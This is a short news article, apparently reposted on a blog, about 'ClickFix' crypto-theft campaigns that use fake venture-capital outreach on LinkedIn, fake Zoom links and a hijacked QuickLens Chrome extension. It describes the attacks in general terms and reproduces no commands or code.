Recent crypto attacks use phishing via venture capital firms and fake Zoom links to execute "ClickFix" scams, copying malware onto victims' devices.
Recent Crypto Attacks Exploit Venture Capital Firms and Browser Extensions
Cybersecurity firm Moonlock Lab recently uncovered a sophisticated phishing campaign where hackers impersonate venture capital firms to carry out "ClickFix" attacks. The attackers, who have been targeting individuals via LinkedIn with false partnership offers, then direct users to fake Zoom or Google Meet links. Upon clicking the fraudulent link, victims are redirected to an event page that masquerades as Cloudflare’s “I’m not a robot” checkbox. This seemingly innocuous step actually copies a malicious command onto their clipboard and prompts them to paste it into their computer's terminal—thereby executing the attack.
### Sophisticated Tactics and Rotating Identities
Moonlock Lab identified individuals using names such as Mykhailo Hureiev, who have been acting as primary points of contact for the initial LinkedIn phase. However, the campaign’s infrastructure is notably sophisticated; Moonlock Lab notes that it rotates identities quickly whenever one front becomes exposed.
Chrome Extension Hijacked to Steal Crypto
Simultaneously, crypto hackers are deploying a "ClickFix" attack through a malicious Chrome extension. The compromised QuickLens browser add-on was initially used for running Google Lens searches but was later repurposed by the attackers after changing its ownership in February. The new version of the extension included scripts capable of launching ClickFix attacks and other information-stealing tools.
### Extensive Data Theft Capabilities
According to Annex Security, which reported on this incident, QuickLens had around 7,000 active users when it was compromised. The hijacked extension reportedly searched for cryptocurrency wallet data and seed phrases, enabling the theft of funds directly from users' wallets. Additionally, it harvested sensitive information including login credentials and payment details from email inboxes like Gmail, YouTube channel data, and other web forms.
Widespread Use of ClickFix Attacks
The "ClickFix" technique has gained traction among threat actors since last year due to its ability to bypass standard security measures by forcing victims to manually execute the malicious payload. Moonlock Lab reports that this method is being used across various industries including manufacturing, wholesale and retail, state and local governments, and utilities.
### Historical Tracking of ClickFix
Security researchers have been tracking the use of "ClickFix" since at least 2024, indicating a longer history than previously acknowledged. Microsoft Threat Intelligence had warned about campaigns targeting enterprise and end-user devices globally in August of last year, emphasizing its widespread impact on multiple sectors.
In summary, these recent incidents highlight the evolving tactics of cybercriminals who are increasingly leveraging sophisticated social engineering techniques to compromise users’ security. As such, vigilance and robust cybersecurity measures remain crucial for protecting against such threats.
Source: Read Original Article
Post a Comment